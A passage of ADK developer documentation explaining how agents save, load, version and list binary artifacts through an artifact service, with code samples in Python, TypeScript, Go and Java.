createPartFromBase64(imageBytes.toString('base64'), "image/png"); console.log(`Artifact MIME Type: ${imageArtifact.inlineData?.mimeType}`); // Note: Accessing raw bytes would require decoding from base64. ``` ```go import ( "log" "google.golang.org/genai" ) // Create a byte slice with the image data. imageBytes, err := os.ReadFile("image.png") if err != nil { log.Fatalf("Failed to read image file: %v", err) } // Create a new artifact with the image data. imageArtifact := &genai.Part{ InlineData: &genai.Blob{ MIMEType: "image/png", Data: imageBytes, }, } log.Printf("Artifact MIME Type: %s", imageArtifact.InlineData.MIMEType) log.Printf("Artifact Data (first 8 bytes): %x...", imageArtifact.InlineData.Data[:8]) ``` ```java import com.google.genai.types.Part; import java.nio.charset.StandardCharsets; public class ArtifactExample { public static void main(String[] args) { // Assume 'imageBytes' contains the binary data of a PNG image byte[] imageBytes = {(byte) 0x89, (byte) 0x50, (byte) 0x4E, (byte) 0x47, (byte) 0x0D, (byte) 0x0A, (byte) 0x1A, (byte) 0x0A, (byte) 0x01, (byte) 0x02}; // Placeholder for actual image bytes // Create an image artifact using Part.fromBytes Part imageArtifact = Part.fromBytes(imageBytes, "image/png"); System.out.println("Artifact MIME Type: " + imageArtifact.inlineData().get().mimeType().get()); System.out.println( "Artifact Data (first 10 bytes): " + new String(imageArtifact.inlineData().get().data().get(), 0, 10, StandardCharsets.UTF_8) + "..."); } } ``` - **Persistence & Management:** Artifacts are not stored directly within the agent or session state. Their storage and retrieval are managed by a dedicated **Artifact Service** (an implementation of `BaseArtifactService`, defined in `google.adk.artifacts`. ADK provides various implementations, such as: - An in-memory service for testing or temporary storage (e.g., `InMemoryArtifactService` in Python, defined in `google.adk.artifacts.in_memory_artifact_service.py`). - A service for persistent storage using Google Cloud Storage (GCS) (e.g., `GcsArtifactService` in Python, defined in `google.adk.artifacts.gcs_artifact_service.py`). The chosen service implementation handles versioning automatically when you save data. ## Why Use Artifacts? While session `state` is suitable for storing small pieces of configuration or conversational context (like strings, numbers, booleans, or small dictionaries/lists), Artifacts are designed for scenarios involving binary or large data: 1. **Handling Non-Textual Data:** Easily store and retrieve images, audio clips, video snippets, PDFs, spreadsheets, or any other file format relevant to your agent's function. 1. **Persisting Large Data:** Session state is generally not optimized for storing large amounts of data. Artifacts provide a dedicated mechanism for persisting larger blobs without cluttering the session state. 1. **User File Management:** Provide capabilities for users to upload files (which can be saved as artifacts) and retrieve or download files generated by the agent (loaded from artifacts). 1. **Sharing Outputs:** Enable tools or agents to generate binary outputs (like a PDF report or a generated image) that can be saved via `save_artifact` and later accessed by other parts of the application or even in subsequent sessions (if using user namespacing). 1. **Caching Binary Data:** Store the results of computationally expensive operations that produce binary data (e.g., rendering a complex chart image) as artifacts to avoid regenerating them on subsequent requests. In essence, whenever your agent needs to work with file-like binary data that needs to be persisted, versioned, or shared, Artifacts managed by an `ArtifactService` are the appropriate mechanism within ADK. ## Common Use Cases Artifacts provide a flexible way to handle binary data within your ADK applications. Here are some typical scenarios where they prove valuable: - **Generated Reports/Files:** - A tool or agent generates a report (e.g., a PDF analysis, a CSV data export, an image chart). - **Handling User Uploads:** - A user uploads a file (e.g., an image for analysis, a document for summarization) through a front-end interface. - **Storing Intermediate Binary Results:** - An agent performs a complex multi-step process where one step generates intermediate binary data (e.g., audio synthesis, simulation results). - **Persistent User Data:** - Storing user-specific configuration or data that isn't a simple key-value state. - **Caching Generated Binary Content:** - An agent frequently generates the same binary output based on certain inputs (e.g., a company logo image, a standard audio greeting). ## Core Concepts Understanding artifacts involves grasping a few key components: the service that manages them, the data structure used to hold them, and how they are identified and versioned. ### Artifact Service (`BaseArtifactService`) - **Role:** The central component responsible for the actual storage and retrieval logic for artifacts. It defines *how* and *where* artifacts are persisted. - **Interface:** Defined by the abstract base class `BaseArtifactService`. Any concrete implementation must provide methods for: - `Save Artifact`: Stores the artifact data and returns its assigned version number. - `Load Artifact`: Retrieves a specific version (or the latest) of an artifact. - `List Artifact keys`: Lists the unique filenames of artifacts within a given scope. - `Delete Artifact`: Removes an artifact (and potentially all its versions, depending on implementation). - `List versions`: Lists all available version numbers for a specific artifact filename. - **Configuration:** You provide an instance of an artifact service (e.g., `InMemoryArtifactService`, `GcsArtifactService`) when initializing the `Runner`. The `Runner` then makes this service available to agents and tools via the `InvocationContext`. ```py from google.adk.runners import Runner from google.adk.artifacts import InMemoryArtifactService # Or GcsArtifactService from google.adk.agents import LlmAgent # Any agent from google.adk.sessions import InMemorySessionService # Example: Configuring the Runner with an Artifact Service my_agent = LlmAgent(name="artifact_user_agent", model="gemini-2.0-flash") artifact_service = InMemoryArtifactService() # Choose an implementation session_service = InMemorySessionService() runner = Runner( agent=my_agent, app_name="my_artifact_app", session_service=session_service, artifact_service=artifact_service # Provide the service instance here ) # Now, contexts within runs managed by this runner can use artifact methods ``` ```typescript import { InMemoryRunner } from '@google/adk'; import { LlmAgent } from '@google/adk'; import { InMemoryArtifactService } from '@google/adk'; import { InMemorySessionService } from '@google/adk'; // Example: Configuring the Runner with an Artifact Service const myAgent = new LlmAgent({name: "artifact_user_agent", model: "gemini-2.5-flash"}); const artifactService = new InMemoryArtifactService(); // Choose an implementation const sessionService = new InMemorySessionService(); const runner = new InMemoryRunner({ agent: myAgent, appName: "my_artifact_app", sessionService: sessionService, artifactService: artifactService, // Provide the service instance here }); // Now, contexts within runs managed by this runner can use artifact methods ``` ```go import ( "context" "log" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/artifactservice" "google.golang.org/adk/llm/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/sessionservice" "google.golang.org/genai" ) // Create a new context. ctx := context.Background() // Set the app name. const appName = "my_artifact_app" // Create a new Gemini model. model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Create a new LLM agent. myAgent, err := llmagent.New(llmagent.Config{ Model: model, Name: "artifact_user_agent", Instruction: "You are an agent that describes images.", BeforeModelCallbacks: []llmagent.BeforeModelCallback{ BeforeModelCallback, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create a new in-memory artifact service. artifactService := artifact.InMemoryService() // Create a new in-memory session service. sessionService := session.InMemoryService() // Create a new runner. r, err := runner.New(runner.Config{ Agent: myAgent, AppName: appName, SessionService: sessionService, ArtifactService: artifactService, // Provide the service instance here }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } log.Printf("Runner created successfully: %v", r) ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.artifacts.InMemoryArtifactService; // Example: Configuring the Runner with an Artifact Service LlmAgent myAgent = LlmAgent.builder() .name("artifact_user_agent") .model("gemini-2.0-flash") .build(); InMemoryArtifactService artifactService = new InMemoryArtifactService(); // Choose an implementation InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(myAgent, "my_artifact_app", artifactService, sessionService); // Provide the service instance here // Now, contexts within runs managed by this runner can use artifact methods ``` ### Artifact Data - **Standard Representation:** Artifact content is universally represented using the `google.genai.types.Part` object, the same structure used for parts of LLM messages. - **Key Attribute (`inline_data`):** For artifacts, the most relevant attribute is `inline_data`, which is a `google.genai.types.Blob` object containing: - `data` (`bytes`): The raw binary content of the artifact. - `mime_type` (`str`): A standard MIME type string (e.g., `'application/pdf'`, `'image/png'`, `'audio/mpeg'`) describing the nature of the binary data. **This is crucial for correct interpretation when loading the artifact.** ```python import google.genai.types as types # Example: Creating an artifact Part from raw bytes pdf_bytes = b'%PDF-1.4...' # Your raw PDF data pdf_mime_type = "application/pdf" # Using the constructor pdf_artifact_py = types.Part( inline_data=types.Blob(data=pdf_bytes, mime_type=pdf_mime_type) ) # Using the convenience class method (equivalent) pdf_artifact_alt_py = types.Part.from_bytes(data=pdf_bytes, mime_type=pdf_mime_type) print(f"Created Python artifact with MIME type: {pdf_artifact_py.inline_data.mime_type}") ``` ```typescript import type { Part } from '@google/genai'; import { createPartFromBase64 } from '@google/genai'; // Example: Creating an artifact Part from raw bytes const pdfBytes = new Uint8Array([0x25, 0x50, 0x44, 0x46, 0x2d, 0x31, 0x2e, 0x34]); // Your raw PDF data const pdfMimeType = "application/pdf"; const pdfArtifact: Part = createPartFromBase64(pdfBytes.toString('base64'), pdfMimeType); console.log(`Created TypeScript artifact with MIME Type: ${pdfArtifact.inlineData?.mimeType}`); ``` ```go import ( "log" "os" "google.golang.org/genai" ) // Load imageBytes from a file imageBytes, err := os.ReadFile("image.png") if err != nil { log.Fatalf("Failed to read image file: %v", err) } // genai.NewPartFromBytes is a convenience function that is a shorthand for // creating a &genai.Part with the InlineData field populated. // Create a new artifact from the image data. imageArtifact := genai.NewPartFromBytes([]byte(imageBytes), "image/png") log.Printf("Artifact MIME Type: %s", imageArtifact.InlineData.MIMEType) ``` ```java import com.google.genai.types.Blob; import com.google.genai.types.Part; import java.nio.charset.StandardCharsets; public class ArtifactDataExample { public static void main(String[] args) { // Example: Creating an artifact Part from raw bytes byte[] pdfBytes = "%PDF-1.4...".getBytes(StandardCharsets.UTF_8); // Your raw PDF data String pdfMimeType = "application/pdf"; // Using the Part.fromBlob() constructor with a Blob Blob pdfBlob = Blob.builder() .data(pdfBytes) .mimeType(pdfMimeType) .build(); Part pdfArtifactJava = Part.builder().inlineData(pdfBlob).build(); // Using the convenience static method Part.fromBytes() (equivalent) Part pdfArtifactAltJava = Part.fromBytes(pdfBytes, pdfMimeType); // Accessing mimeType, note the use of Optional String mimeType = pdfArtifactJava.inlineData() .flatMap(Blob::mimeType) .orElse("unknown"); System.out.println("Created Java artifact with MIME type: " + mimeType); // Accessing data byte[] data = pdfArtifactJava.inlineData() .flatMap(Blob::data) .orElse(new byte[0]); System.out.println("Java artifact data (first 10 bytes): " + new String(data, 0, Math.min(data.length, 10), StandardCharsets.UTF_8) + "..."); } } ``` ### Filename - **Identifier:** A simple string used to name and retrieve an artifact within its specific namespace. - **Uniqueness:** Filenames must be unique within their scope (either the session or the user namespace). - **Best Practice:** Use descriptive names, potentially including file extensions (e.g., `"monthly_report.pdf"`, `"user_avatar.jpg"`), although the extension itself doesn't dictate behavior – the `mime_type` does. ### Versioning - **Automatic Versioning:** The artifact service automatically handles versioning. When you call `save_artifact`, the service determines the next available version number (typically starting from 0 and incrementing) for that specific filename and scope. - **Returned by `save_artifact`:** The `save_artifact` method returns the integer version number that was assigned to the newly saved artifact. - **Retrieval:** - `load_artifact(..., version=None)` (default): Retrieves the *latest* available version of the artifact. - `load_artifact(..., version=N)`: Retrieves the specific version `N`. - **Listing Versions:** The `list_versions` method (on the service, not context) can be used to find all existing version numbers for an artifact. ### Namespacing (Session vs. User) - **Concept:** Artifacts can be scoped either to a specific session or more broadly to a user across all their sessions within the application. This scoping is determined by the `filename` format and handled internally by the `ArtifactService`. - **Default (Session Scope):** If you use a plain filename like `"report.pdf"`, the artifact is associated with the specific `app_name`, `user_id`, *and* `session_id`. It's only accessible within that exact session context. - **User Scope (`"user:"` prefix):** If you prefix the filename with `"user:"`, like `"user:profile.png"`, the artifact is associated only with the `app_name` and `user_id`. It can be accessed or updated from *any* session belonging to that user within the app. ```python # Example illustrating namespace difference (conceptual) # Session-specific artifact filename session_report_filename = "summary.txt" # User-specific artifact filename user_config_filename = "user:settings.json" # When saving 'summary.txt' via context.save_artifact, # it's tied to the current app_name, user_id, and session_id. # When saving 'user:settings.json' via context.save_artifact, # the ArtifactService implementation should recognize the "user:" prefix # and scope it to app_name and user_id, making it accessible across sessions for that user. ``` ```typescript // Example illustrating namespace difference (conceptual) // Session-specific artifact filename const sessionReportFilename = "summary.txt"; // User-specific artifact filename const userConfigFilename = "user:settings.json"; // When saving 'summary.txt' via context.saveArtifact, it's tied to the current appName, userId, and sessionId. // When saving 'user:settings.json' via context.saveArtifact, the ArtifactService implementation recognizes the "user:" prefix and scopes it to appName and userId, making it accessible across sessions for that user. ``` ```go import ( "log" ) // Note: Namespacing is only supported when using the GCS ArtifactService implementation. // A session-scoped artifact is only available within the current session. sessionReportFilename := "summary.txt" // A user-scoped artifact is available across all sessions for the current user. userConfigFilename := "user:settings.json" // When saving 'summary.txt' via ctx.Artifacts().Save, // it's tied to the current app_name, user_id, and session_id. // ctx.Artifacts().Save(sessionReportFilename, *artifact); // When saving 'user:settings.json' via ctx.Artifacts().Save, // the ArtifactService implementation should recognize the "user:" prefix // and scope it to app_name and user_id, making it accessible across sessions for that user. // ctx.Artifacts().Save(userConfigFilename, *artifact); ``` ```java // Example illustrating namespace difference (conceptual) // Session-specific artifact filename String sessionReportFilename = "summary.txt"; // User-specific artifact filename String userConfigFilename = "user:settings.json"; // The "user:" prefix is key // When saving 'summary.txt' via context.save_artifact, // it's tied to the current app_name, user_id, and session_id. // artifactService.saveArtifact(appName, userId, sessionId1, sessionReportFilename, someData); // When saving 'user:settings.json' via context.save_artifact, // the ArtifactService implementation should recognize the "user:" prefix // and scope it to app_name and user_id, making it accessible across sessions for that user. // artifactService.saveArtifact(appName, userId, sessionId1, userConfigFilename, someData); ``` These core concepts work together to provide a flexible system for managing binary data within the ADK framework. ## Interacting with Artifacts (via Context Objects) The primary way you interact with artifacts within your agent's logic (specifically within callbacks or tools) is through methods provided by the `CallbackContext` and `ToolContext` objects. These methods abstract away the underlying storage details managed by the `ArtifactService`. ### Prerequisite: Configuring the `ArtifactService` Before you can use any artifact methods via the context objects, you **must** provide an instance of a [`BaseArtifactService` implementation](#available-implementations) (like [`InMemoryArtifactService`](#inmemoryartifactservice) or [`GcsArtifactService`](#gcsartifactservice)) when initializing your `Runner`. In Python, you provide this instance when initializing your `Runner`. ```python from google.adk.runners import Runner from google.adk.artifacts import InMemoryArtifactService # Or GcsArtifactService from google.adk.agents import LlmAgent from google.adk.sessions import InMemorySessionService # Your agent definition agent = LlmAgent(name="my_agent", model="gemini-2.0-flash") # Instantiate the desired artifact service artifact_service = InMemoryArtifactService() # Provide it to the Runner runner = Runner( agent=agent, app_name="artifact_app", session_service=InMemorySessionService(), artifact_service=artifact_service # Service must be provided here ) ``` If no `artifact_service` is configured in the `InvocationContext` (which happens if it's not passed to the `Runner`), calling `save_artifact`, `load_artifact`, or `list_artifacts` on the context objects will raise a `ValueError`. ```typescript import { LlmAgent, InMemoryRunner, InMemoryArtifactService, InMemorySessionService } from '@google/adk'; // Your agent definition const agent = new LlmAgent({name: "my_agent", model: "gemini-2.5-flash"}); // Instantiate the desired artifact service const artifactService = new InMemoryArtifactService(); // Provide it to the Runner const runner = new InMemoryRunner({ agent: agent, appName: "artifact_app", sessionService: new InMemorySessionService(), artifactService: artifactService, // Service must be provided here }); // If no artifactService is configured, calling artifact methods on context objects will throw an error. ``` In Java, if an `ArtifactService` instance is not available (e.g., `null`) when artifact operations are attempted, it would typically result in a `NullPointerException` or a custom error, depending on how your application is structured. Robust applications often use dependency injection frameworks to manage service lifecycles and ensure availability. ```go import ( "context" "log" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/artifactservice" "google.golang.org/adk/llm/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/sessionservice" "google.golang.org/genai" ) // Create a new context. ctx := context.Background() // Set the app name. const appName = "my_artifact_app" // Create a new Gemini model. model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Create a new LLM agent. myAgent, err := llmagent.New(llmagent.Config{ Model: model, Name: "artifact_user_agent", Instruction: "You are an agent that describes images.", BeforeModelCallbacks: []llmagent.BeforeModelCallback{ BeforeModelCallback, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create a new in-memory artifact service. artifactService := artifact.InMemoryService() // Create a new in-memory session service. sessionService := session.InMemoryService() // Create a new runner. r, err := runner.New(runner.Config{ Agent: myAgent, AppName: appName, SessionService: sessionService, ArtifactService: artifactService, // Provide the service instance here }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } log.Printf("Runner created successfully: %v", r) ``` In Java, you would instantiate a `BaseArtifactService` implementation and then ensure it's accessible to the parts of your application that manage artifacts. This is often done through dependency injection or by explicitly passing the service instance. ```java import com.google.adk.agents.LlmAgent; import com.google.adk.artifacts.InMemoryArtifactService; // Or GcsArtifactService import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; public class SampleArtifactAgent { public static void main(String[] args) { // Your agent definition LlmAgent agent = LlmAgent.builder() .name("my_agent") .model("gemini-2.0-flash") .build(); // Instantiate the desired artifact service InMemoryArtifactService artifactService = new InMemoryArtifactService(); // Provide it to the Runner Runner runner = new Runner(agent, "APP_NAME", artifactService, // Service must be provided here new InMemorySessionService()); } } ``` ### Accessing Methods The artifact interaction methods are available directly on instances of `CallbackContext` (passed to agent and model callbacks) and `ToolContext` (passed to tool callbacks). Remember that `ToolContext` inherits from `CallbackContext`. #### Saving Artifacts - **Code Example:** ```python import google.genai.types as types from google.adk.agents.callback_context import CallbackContext # Or ToolContext async def save_generated_report_py(context: CallbackContext, report_bytes: bytes): """Saves generated PDF report bytes as an artifact.""" report_artifact = types.Part.from_bytes( data=report_bytes, mime_type="application/pdf" ) filename = "generated_report.pdf" try: version = await context.save_artifact(filename=filename, artifact=report_artifact) print(f"Successfully saved Python artifact '{filename}' as version {version}.") # The event generated after this callback will contain: # event.actions.artifact_delta == {"generated_report.pdf": version} except ValueError as e: print(f"Error saving Python artifact: {e}. Is ArtifactService configured in Runner?") except Exception as e: # Handle potential storage errors (e.g., GCS permissions) print(f"An unexpected error occurred during Python artifact save: {e}") # --- Example Usage Concept (Python) --- # async def main_py(): # callback_context: CallbackContext = ... # obtain context # report_data = b'...' # Assume this holds the PDF bytes # await save_generated_report_py(callback_context, report_data) ``` ```typescript import type { Part } from '@google/genai'; import { createPartFromBase64 } from '@google/genai'; import { CallbackContext } from '@google/adk'; async function saveGeneratedReport(context: CallbackContext, reportBytes: Uint8Array): Promise { /**Saves generated PDF report bytes as an artifact.*/ const reportArtifact: Part = createPartFromBase64(reportBytes.toString('base64'), "application/pdf"); const filename = "generated_report.pdf"; try { const version = await context.saveArtifact(filename, reportArtifact); console.log(`Successfully saved TypeScript artifact '${filename}' as version ${version}.`); } catch (e: any) { console.error(`Error saving TypeScript artifact: ${e.message}. Is ArtifactService configured in Runner?`); } } ``` ```go import ( "log" "google.golang.org/adk/agent" "google.golang.org/adk/llm" "google.golang.org/genai" ) // saveReportCallback is a BeforeModel callback that saves a report from session state. func saveReportCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { // Get the report data from the session state. reportData, err := ctx.State().Get("report_bytes") if err != nil { log.Printf("No report data found in session state: %v", err) return nil, nil // No report to save, continue normally. } // Check if the report data is in the expected format. reportBytes, ok := reportData.([]byte) if !ok { log.Printf("Report data in session state was not in the expected byte format.") return nil, nil } // Create a new artifact with the report data. reportArtifact := &genai.Part{ InlineData: &genai.Blob{ MIMEType: "application/pdf", Data: reportBytes, }, } // Set the filename for the artifact. filename := "generated_report.pdf" // Save the artifact to the artifact service. _, err = ctx.Artifacts().Save(ctx, filename, reportArtifact) if err != nil { log.Printf("An unexpected error occurred during Go artifact save: %v", err) // Depending on requirements, you might want to return an error to the user. return nil, nil } log.Printf("Successfully saved Go artifact '%s'.", filename) // Return nil to continue to the next callback or the model. return nil, nil } ``` ```java import com.google.adk.agents.CallbackContext; import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.InMemoryArtifactService; import com.google.genai.types.Part; import java.nio.charset.StandardCharsets; public class SaveArtifactExample { public void saveGeneratedReport(CallbackContext callbackContext, byte[] reportBytes) { // Saves generated PDF report bytes as an artifact. Part reportArtifact = Part.fromBytes(reportBytes, "application/pdf"); String filename = "generatedReport.pdf"; callbackContext.saveArtifact(filename, reportArtifact); System.out.println("Successfully saved Java artifact '" + filename); // The event generated after this callback will contain: // event().actions().artifactDelta == {"generated_report.pdf": version} } // --- Example Usage Concept (Java) --- public static void main(String[] args) { BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService SaveArtifactExample myTool = new SaveArtifactExample(); byte[] reportData = "...".getBytes(StandardCharsets.UTF_8); // PDF bytes CallbackContext callbackContext; // ... obtain callback context from your app myTool.saveGeneratedReport(callbackContext, reportData); // Due to async nature, in a real app, ensure program waits or handles completion. } } ``` #### Loading Artifacts - **Code Example:** ```python import google.genai.types as types from google.adk.agents.callback_context import CallbackContext # Or ToolContext async def process_latest_report_py(context: CallbackContext): """Loads the latest report artifact and processes its data.""" filename = "generated_report.pdf" try: # Load the latest version report_artifact = await context.load_artifact(filename=filename) if report_artifact and report_artifact.inline_data: print(f"Successfully loaded latest Python artifact '{filename}'.") print(f"MIME Type: {report_artifact.inline_data.mime_type}") # Process the report_artifact.inline_data.data (bytes) pdf_bytes = report_artifact.inline_data.data print(f"Report size: {len(pdf_bytes)} bytes.") # ... further processing ... else: print(f"Python artifact '{filename}' not found.") # Example: Load a specific version (if version 0 exists) # specific_version_artifact = await context.load_artifact(filename=filename, version=0) # if specific_version_artifact: # print(f"Loaded version 0 of '{filename}'.") except ValueError as e: print(f"Error loading Python artifact: {e}. Is ArtifactService configured?") except Exception as e: # Handle potential storage errors print(f"An unexpected error occurred during Python artifact load: {e}") # --- Example Usage Concept (Python) --- # async def main_py(): # callback_context: CallbackContext = ... # obtain context # await process_latest_report_py(callback_context) ``` ```typescript import { CallbackContext } from '@google/adk'; async function processLatestReport(context: CallbackContext): Promise { /**Loads the latest report artifact and processes its data.*/ const filename = "generated_report.pdf"; try { // Load the latest version const reportArtifact = await context.loadArtifact(filename); if (reportArtifact?.inlineData) { console.log(`Successfully loaded latest TypeScript artifact '${filename}'.`); console.log(`MIME Type: ${reportArtifact.inlineData.mimeType}`); // Process the reportArtifact.inlineData.data (base64 string) const pdfData = Buffer.from(reportArtifact.inlineData.data, 'base64'); console.log(`Report size: ${pdfData.length} bytes.`); // ... further processing ... } else { console.log(`TypeScript artifact '${filename}' not found.`); } } catch (e: any) { console.error(`Error loading TypeScript artifact: ${e.message}. Is ArtifactService configured?`); } } ``` ```go import ( "log" "google.golang.org/adk/agent" "google.golang.org/adk/llm" ) // loadArtifactsCallback is a BeforeModel callback that loads a specific artifact // and adds its content to the LLM request. func loadArtifactsCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("[Callback] loadArtifactsCallback triggered.") // In a real app, you would parse the user's request to find a filename. // For this example, we'll hardcode a filename to demonstrate. const filenameToLoad = "generated_report.pdf" // Load the artifact from the artifact service. loadedPartResponse, err := ctx.Artifacts().Load(ctx, filenameToLoad) if err != nil { log.Printf("Callback could not load artifact '%s': %v", filenameToLoad, err) return nil, nil // File not found or error, continue to model. } loadedPart := loadedPartResponse.Part log.Printf("Callback successfully loaded artifact '%s'.", filenameToLoad) // Ensure there's at least one content in the request to append to. if len(req.Contents) == 0 { req.Contents = []*genai.Content{{Parts: []*genai.Part{ genai.NewPartFromText("SYSTEM: The following file is provided for context:\n"), }}} } // Add the loaded artifact to the request for the model. lastContent := req.Contents[len(req.Contents)-1] lastContent.Parts = append(lastContent.Parts, loadedPart) log.Printf("Added artifact '%s' to LLM request.", filenameToLoad) // Return nil to continue to the next callback or the model. return nil, nil // Continue to next callback or LLM call } ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.MaybeObserver; import io.reactivex.rxjava3.disposables.Disposable; import java.util.Optional; public class MyArtifactLoaderService { private final BaseArtifactService artifactService; private final String appName; public MyArtifactLoaderService(BaseArtifactService artifactService, String appName) { this.artifactService = artifactService; this.appName = appName; } public void processLatestReportJava(String userId, String sessionId, String filename) { // Load the latest version by passing Optional.empty() for the version artifactService .loadArtifact(appName, userId, sessionId, filename, Optional.empty()) .subscribe( new MaybeObserver() { @Override public void onSubscribe(Disposable d) { // Optional: handle subscription } @Override public void onSuccess(Part reportArtifact) { System.out.println( "Successfully loaded latest Java artifact '" + filename + "'."); reportArtifact .inlineData() .ifPresent( blob -> { System.out.println( "MIME Type: " + blob.mimeType().orElse("N/A")); byte[] pdfBytes = blob.data().orElse(new byte[0]); System.out.println("Report size: " + pdfBytes.length + " bytes."); // ... further processing of pdfBytes ... }); } @Override public void onError(Throwable e) { // Handle potential storage errors or other exceptions System.err.println( "An error occurred during Java artifact load for '" + filename + "': " + e.getMessage()); } @Override public void onComplete() { // Called if the artifact (latest version) is not found System.out.println("Java artifact '" + filename + "' not found."); } }); // Example: Load a specific version (e.g., version 0) /* artifactService.loadArtifact(appName, userId, sessionId, filename, Optional.of(0)) .subscribe(part -> { System.out.println("Loaded version 0 of Java artifact '" + filename + "'."); }, throwable -> { System.err.println("Error loading version 0 of '" + filename + "': " + throwable.getMessage()); }, () -> { System.out.println("Version 0 of Java artifact '" + filename + "' not found."); }); */ } // --- Example Usage Concept (Java) --- public static void main(String[] args) { // BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService // MyArtifactLoaderService loader = new MyArtifactLoaderService(service, "myJavaApp"); // loader.processLatestReportJava("user123", "sessionABC", "java_report.pdf"); // Due to async nature, in a real app, ensure program waits or handles completion. } } ``` #### Listing Artifact Filenames - **Code Example:** ```python from google.adk.tools.tool_context import ToolContext def list_user_files_py(tool_context: ToolContext) -> str: """Tool to list available artifacts for the user.""" try: available_files = await tool_context.list_artifacts() if not available_files: return "You have no saved artifacts." else: # Format the list for the user/LLM file_list_str = "\n".join([f"- {fname}" for fname in available_files]) return f"Here are your available Python artifacts:\n{file_list_str}" except ValueError as e: print(f"Error listing Python artifacts: {e}. Is ArtifactService configured?") return "Error: Could not list Python artifacts." except Exception as e: print(f"An unexpected error occurred during Python artifact list: {e}") return "Error: An unexpected error occurred while listing Python artifacts." # This function would typically be wrapped in a FunctionTool # from google.adk.tools import FunctionTool # list_files_tool = FunctionTool(func=list_user_files_py) ``` ```typescript import { ToolContext } from '@google/adk'; async function listUserFiles(toolContext: ToolContext): Promise { /**Tool to list available artifacts for the user.*/ try { const availableFiles = await toolContext.listArtifacts(); if (!availableFiles || availableFiles.length === 0) { return "You have no saved artifacts."; } else { // Format the list for the user/LLM const fileListStr = availableFiles.map(fname => `- ${fname}`).join("\n"); return `Here are your available TypeScript artifacts:\n${fileListStr}`; } } catch (e: any) { console.error(`Error listing TypeScript artifacts: ${e.message}. Is ArtifactService configured?`); return "Error: Could not list TypeScript artifacts."; } } ``` ```go import ( "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/llm" "google.golang.org/genai" ) // listUserFilesCallback is a BeforeModel callback that lists available artifacts // and adds the list as context to the LLM request. func listUserFilesCallback(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("[Callback] listUserFilesCallback triggered.") // List the available artifacts from the artifact service. listResponse, err := ctx.Artifacts().List(ctx) if err != nil { log.Printf("An unexpected error occurred during Go artifact list: %v", err) return nil, nil // Continue, but log the error. } availableFiles := listResponse.FileNames log.Printf("Found %d available files.", len(availableFiles)) // If there are available files, add them to the LLM request. if len(availableFiles) > 0 { var fileListStr strings.Builder fileListStr.WriteString("SYSTEM: The following files are available:\n") for _, fname := range availableFiles { fileListStr.WriteString(fmt.Sprintf("- %s\n", fname)) } // Prepend this information to the user's request for the model. if len(req.Contents) > 0 { lastContent := req.Contents[len(req.Contents)-1] if len(lastContent.Parts) > 0 { fileListStr.WriteString("\n") // Add a newline for separation. lastContent.Parts[0] = genai.NewPartFromText(fileListStr.String() + lastContent.Parts[0].Text) log.Println("Added file list to LLM request context.") } } log.Printf("Available files:\n%s", fileListStr.String()) } else { log.Println("No available files found to list.") } // Return nil to continue to the next callback or the model. return nil, nil // Continue to next callback or LLM call } ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.ListArtifactsResponse; import com.google.common.collect.ImmutableList; import io.reactivex.rxjava3.core.SingleObserver; import io.reactivex.rxjava3.disposables.Disposable; public class MyArtifactListerService { private final BaseArtifactService artifactService; private final String appName; public MyArtifactListerService(BaseArtifactService artifactService, String appName) { this.artifactService = artifactService; this.appName = appName; } // Example method that might be called by a tool or agent logic public void listUserFilesJava(String userId, String sessionId) { artifactService .listArtifactKeys(appName, userId, sessionId) .subscribe( new SingleObserver() { @Override public void onSubscribe(Disposable d) { // Optional: handle subscription } @Override public void onSuccess(ListArtifactsResponse response) { ImmutableList availableFiles = response.filenames(); if (availableFiles.isEmpty()) { System.out.println( "User " + userId + " in session " + sessionId + " has no saved Java artifacts."); } else { StringBuilder fileListStr = new StringBuilder( "Here are the available Java artifacts for user " + userId + " in session " + sessionId + ":\n"); for (String fname : availableFiles) { fileListStr.append("- ").append(fname).append("\n"); } System.out.println(fileListStr.toString()); } } @Override public void onError(Throwable e) { System.err.println( "Error listing Java artifacts for user " + userId + " in session " + sessionId + ": " + e.getMessage()); // In a real application, you might return an error message to the user/LLM } }); } // --- Example Usage Concept (Java) --- public static void main(String[] args) { // BaseArtifactService service = new InMemoryArtifactService(); // Or GcsArtifactService // MyArtifactListerService lister = new MyArtifactListerService(service, "myJavaApp"); // lister.listUserFilesJava("user123", "sessionABC"); // Due to async nature, in a real app, ensure program waits or handles completion. } } ``` These methods for saving, loading, and listing provide a convenient and consistent way to manage binary data persistence within ADK, whether using Python's context objects or directly interacting with the `BaseArtifactService` in Java, regardless of the chosen backend storage implementation. ## Available Implementations ADK provides concrete implementations of the `BaseArtifactService` interface, offering different storage backends suitable for various development stages and deployment needs. These implementations handle the details of storing, versioning, and retrieving artifact data based on the `app_name`, `user_id`, `session_id`, and `filename` (including the `user:` namespace prefix). ### InMemoryArtifactService - **Storage Mechanism:** - Python: Uses a Python dictionary (`self.artifacts`) held in the application's memory. The dictionary keys represent the artifact path, and the values are lists of 